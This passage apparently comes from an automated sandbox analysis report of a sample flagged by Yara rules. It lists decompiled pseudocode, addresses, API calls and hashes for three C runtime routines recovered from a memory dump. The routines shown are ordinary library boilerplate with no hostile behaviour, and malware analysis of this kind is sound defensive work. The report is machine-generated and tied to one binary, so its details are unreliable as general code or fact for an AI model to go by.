                                                                      • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                                                      • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E00405751(signed int _a4) {
                                                                      				signed int _t9;
                                                                      				void* _t13;
                                                                      				signed int _t15;
                                                                      				WCHAR* _t22;
                                                                      				signed int _t24;
                                                                      				signed int* _t25;
                                                                      				void* _t27;
                                                                      
                                                                      				_t9 = _a4;
                                                                      				_t25 = 0x412fc8 + _t9 * 4;
                                                                      				_t24 =  *_t25;
                                                                      				if(_t24 == 0) {
                                                                      					_t22 =  *(0x40cd48 + _t9 * 4);
                                                                      					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                                      					if(_t27 != 0) {
                                                                      						L8:
                                                                      						 *_t25 = _t27;
                                                                      						if( *_t25 != 0) {
                                                                      							FreeLibrary(_t27);
                                                                      						}
                                                                      						_t13 = _t27;
                                                                      						L11:
                                                                      						return _t13;
                                                                      					}
                                                                      					_t15 = GetLastError();
                                                                      					if(_t15 != 0x57) {
                                                                      						_t27 = 0;
                                                                      					} else {
                                                                      						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                                      						_t27 = _t15;
                                                                      					}
                                                                      					if(_t27 != 0) {
                                                                      						goto L8;
                                                                      					} else {
                                                                      						 *_t25 = _t15 | 0xffffffff;
                                                                      						_t13 = 0;
                                                                      						goto L11;
                                                                      					}
                                                                      				}
                                                                      				_t4 = _t24 + 1; // 0xfd571265
                                                                      				asm("sbb eax, eax");
                                                                      				return  ~_t4 & _t24;
                                                                      			}










                                                                      0x00405756
                                                                      0x0040575a
                                                                      0x00405761
                                                                      0x00405765
                                                                      0x00405773
                                                                      0x00405789
                                                                      0x0040578d
                                                                      0x004057b6
                                                                      0x004057b8
                                                                      0x004057bc
                                                                      0x004057bf
                                                                      0x004057bf
                                                                      0x004057c5
                                                                      0x004057c7
                                                                      0x00000000
                                                                      0x004057c8
                                                                      0x0040578f
                                                                      0x00405798
                                                                      0x004057a7
                                                                      0x0040579a
                                                                      0x0040579d
                                                                      0x004057a3
                                                                      0x004057a3
                                                                      0x004057ab
                                                                      0x00000000
                                                                      0x004057ad
                                                                      0x004057b0
                                                                      0x004057b2
                                                                      0x00000000
                                                                      0x004057b2
                                                                      0x004057ab
                                                                      0x00405767
                                                                      0x0040576c
                                                                      0x00000000

                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                                                                      • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.585204726.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 3177248105-0
                                                                      • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                                      • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                                                                      • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                                      • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E00404320(void* __ebx, void* __ecx, void* __edx) {
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				intOrPtr _t2;
                                                                      				void* _t3;
                                                                      				void* _t4;
                                                                      				intOrPtr _t9;
                                                                      				void* _t11;
                                                                      				void* _t20;
                                                                      				void* _t21;
                                                                      				void* _t23;
                                                                      				void* _t25;
                                                                      				void* _t27;
                                                                      				void* _t29;
                                                                      				void* _t31;
                                                                      				void* _t32;
                                                                      				long _t36;
                                                                      				long _t37;
                                                                      				void* _t40;
                                                                      
                                                                      				_t29 = __edx;
                                                                      				_t23 = __ecx;
                                                                      				_t20 = __ebx;
                                                                      				_t36 = GetLastError();
                                                                      				_t2 =  *0x412064; // 0x7
                                                                      				_t42 = _t2 - 0xffffffff;
                                                                      				if(_t2 == 0xffffffff) {
                                                                      					L2:
                                                                      					_t3 = E00403ECE(_t23, 1, 0x364);
                                                                      					_t31 = _t3;
                                                                      					_pop(_t25);
                                                                      					if(_t31 != 0) {
                                                                      						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
                                                                      						__eflags = _t4;
                                                                      						if(_t4 != 0) {
                                                                      							E00404192(_t25, _t31, 0x4132a4);
                                                                      							E00403E03(0);
                                                                      							_t40 = _t40 + 0xc;
                                                                      							__eflags = _t31;
                                                                      							if(_t31 == 0) {
                                                                      								goto L9;
                                                                      							} else {
                                                                      								goto L8;
                                                                      							}
                                                                      						} else {
                                                                      							_push(_t31);
                                                                      							goto L4;
                                                                      						}
                                                                      					} else {
                                                                      						_push(_t3);
                                                                      						L4:
                                                                      						E00403E03();
                                                                      						_pop(_t25);
                                                                      						L9:
                                                                      						SetLastError(_t36);
                                                                      						E00403E8B(_t20, _t29, _t31, _t36);
                                                                      						asm("int3");
                                                                      						_push(_t20);
                                                                      						_push(_t36);
                                                                      						_push(_t31);
                                                                      						_t37 = GetLastError();
                                                                      						_t21 = 0;
                                                                      						_t9 =  *0x412064; // 0x7
                                                                      						_t45 = _t9 - 0xffffffff;
                                                                      						if(_t9 == 0xffffffff) {
                                                                      							L12:
                                                                      							_t32 = E00403ECE(_t25, 1, 0x364);
                                                                      							_pop(_t27);
                                                                      							if(_t32 != 0) {
                                                                      								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
                                                                      								__eflags = _t11;
                                                                      								if(_t11 != 0) {
                                                                      									E00404192(_t27, _t32, 0x4132a4);
                                                                      									E00403E03(_t21);
                                                                      									__eflags = _t32;
                                                                      									if(_t32 != 0) {
                                                                      										goto L19;
                                                                      									} else {
                                                                      										goto L18;
                                                                      									}
                                                                      								} else {
                                                                      									_push(_t32);
                                                                      									goto L14;
                                                                      								}
                                                                      							} else {
                                                                      								_push(_t21);
                                                                      								L14:
                                                                      								E00403E03();
                                                                      								L18:
                                                                      								SetLastError(_t37);
                                                                      							}
                                                                      						} else {
                                                                      							_t32 = E00405878(_t25, _t45, _t9);
                                                                      							if(_t32 != 0) {
                                                                      								L19:
                                                                      								SetLastError(_t37);
                                                                      								_t21 = _t32;
                                                                      							} else {
                                                                      								goto L12;
                                                                      							}
                                                                      						}
                                                                      						return _t21;
                                                                      					}
                                                                      				} else {
                                                                      					_t31 = E00405878(_t23, _t42, _t2);
                                                                      					if(_t31 != 0) {
                                                                      						L8:
                                                                      						SetLastError(_t36);
                                                                      						return _t31;
                                                                      					} else {
                                                                      						goto L2;
                                                                      					}
                                                                      				}
                                                                      			}





















                                                                      0x00404320
                                                                      0x00404320
                                                                      0x00404320
                                                                      0x0040432a
                                                                      0x0040432c
                                                                      0x00404331
                                                                      0x00404334
                                                                      0x00404342
                                                                      0x00404349
                                                                      0x0040434e
                                                                      0x00404351
                                                                      0x00404354
                                                                      0x00404366
                                                                      0x0040436b
                                                                      0x0040436d
                                                                      0x00404378
                                                                      0x0040437f
                                                                      0x00404384
                                                                      0x00404387
                                                                      0x00404389
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040436f
                                                                      0x0040436f
                                                                      0x00000000
                                                                      0x0040436f
                                                                      0x00404356
                                                                      0x00404356
                                                                      0x00404357
                                                                      0x00404357
                                                                      0x0040435c
                                                                      0x00404397
                                                                      0x00404398
                                                                      0x0040439e
                                                                      0x004043a3
                                                                      0x004043a6
                                                                      0x004043a7
                                                                      0x004043a8
                                                                      0x004043af
                                                                      0x004043b1
                                                                      0x004043b3
                                                                      0x004043b8
                                                                      0x004043bb
                                                                      0x004043c9
                                                                      0x004043d5
                                                                      0x004043d8
                                                                      0x004043db
                                                                      0x004043ed
                                                                      0x004043f2
                                                                      0x004043f4
                                                                      0x004043ff
                                                                      0x00404405
                                                                      0x0040440d
                                                                      0x0040440f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004043f6
                                                                      0x004043f6
                                                                      0x00000000
                                                                      0x004043f6
                                                                      0x004043dd
                                                                      0x004043dd
                                                                      0x004043de
                                                                      0x004043de
                                                                      0x00404411
                                                                      0x00404412
                                                                      0x00404412
                                                                      0x004043bd
                                                                      0x004043c3
                                                                      0x004043c7
                                                                      0x0040441a
                                                                      0x0040441b
                                                                      0x00404421
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004043c7
                                                                      0x00404428
                                                                      0x00404428
                                                                      0x00404336
                                                                      0x0040433c
                                                                      0x00404340
                                                                      0x0040438b
                                                                      0x0040438c
                                                                      0x00404396
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404340

                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                                                                      • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                                                                      • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                                                                      • _abort.LIBCMT ref: 0040439E
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.585204726.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$_abort
                                                                      • String ID:
                                                                      • API String ID: 88804580-0
                                                                      • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                                                      • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                                                                      • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                                                      • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004025BA() {
                                                                      				void* _t4;
                                                                      				void* _t8;
                                                                      
                                                                      				E00402AE5();
                                                                      				E00402A79();
                                                                      				if(E004027D9() != 0) {
                                                                      					_t4 = E0040278B(_t8, __eflags);
                                                                      					__eflags = _t4;
                                                                      					if(_t4 != 0) {
                                                                      						return 1;
                                                                      					} else {
                                                                      						E00402815();
                                                                      						goto L1;
                                                                      					}
                                                                      				} else {
                                                                      					L1:
                                                                      					return 0;
                                                                      				}
                                                                      			}





                                                                      0x004025ba
                                                                      0x004025bf
                                                                      0x004025cb
                                                                      0x004025d0
                                                                      0x004025d5
                                                                      0x004025d7
                                                                      0x004025e2
                                                                      0x004025d9
                                                                      0x004025d9
                                                                      0x00000000
                                                                      0x004025d9
                                                                      0x004025cd
                                                                      0x004025cd
                                                                      0x004025cf
                                                                      0x004025cf

                                                                      APIs
                                                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                                                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                                                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                                                                        • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                                                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.585204726.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                      • String ID:
                                                                      • API String ID: 1761009282-0
                                                                      • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                                      • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                                                                      • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                                      • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%